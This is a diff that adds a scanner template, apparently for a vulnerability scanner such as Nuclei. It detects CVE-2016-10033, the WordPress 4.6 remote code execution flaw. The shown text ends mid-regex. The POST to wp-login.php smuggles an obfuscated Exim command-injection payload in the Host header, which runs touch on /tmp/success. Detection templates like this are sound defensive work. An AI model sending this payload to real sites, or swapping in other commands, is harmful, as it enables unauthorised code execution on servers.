diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml new file mode 100644 index 0000000000..cdae3cc13f --- /dev/null +++ b/cves/2016/CVE-2016-10033.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10033 +info: + name: Wordpress 4.6 Remote Code Execution + author: princechaddha + severity: high + reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + Connection: close + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Connection: close + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Accept: */* + Content-Length: 56 + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?